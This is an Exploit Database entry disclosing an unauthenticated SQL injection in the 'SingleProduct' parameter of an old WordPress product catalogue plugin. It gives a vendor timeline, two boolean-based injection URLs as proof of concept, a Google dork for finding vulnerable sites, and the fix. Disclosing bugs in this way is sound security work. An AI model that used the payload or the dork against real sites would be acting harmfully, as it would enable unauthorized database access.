WordPress Plugin Ultimate Product Catalogue – SQL Injection (2)

• Exploit Database
• 22 阅读

• 作者： Felipe Molina
  日期： 2015-04-23
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/36824/

• # Exploit Title: Unauthenticated SQLi on Ultimate Product Catalogue
  wordpress plugin
  # Google Dork: inurl:"SingleProduct" intext:"Back to catalogue"
  intext:"Category",
  inurl:"/wp-content/plugins/ultimate-product-catalogue/product-sheets/"
  # Date: 22/04/2015
  # Exploit Author: Felipe Molina de la Torre (@felmoltor)
  # Vendor Homepage: https://wordpress.org/plugins/ultimate-product-catalogue/
  # Software Link:
  https://downloads.wordpress.org/plugin/ultimate-product-catalogue.3.1.2.zip
  # Version: < 3.1.2, Comunicated and Fixed by the Vendor in 3.1.3
  # Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turnedd off, Apache
  2.4.0 (Ubuntu)
  # CVE : Requested to mitre but not assigned yet
  # Category: webapps
  
  1. Summary:
  
   Ultimate Product Catalogue is A responsive and easily customizable
  plugin for all your product catalogue needs. It has +59.000 downloads,
  +3.000 active installations.
  
   Unauthenticated SQL injection in parameter "SingleProduct" when a web
  visitor explores a product published by the web administrator
  
  2. Vulnerability timeline:
  - 22/04/2015: Identified in version 3.1.2
  - 22/04/2015: Comunicated to developer company etoilewebdesign.com
  - 22/04/2015: Response from etoilewebdesign.com and fixed version in 3.1.3
  3. Vulnerable code:
  
  File Functions/Shortcodes.php line 779
  
  3. Proof of concept
  
  http://<wordpress site>/?SingleProduct=2'+and+'a'='a
  http://<wordpress site>/?SingleProduct=2'+and+'a'='b
  
  4. Solution:
  
  Update to version 3.1.3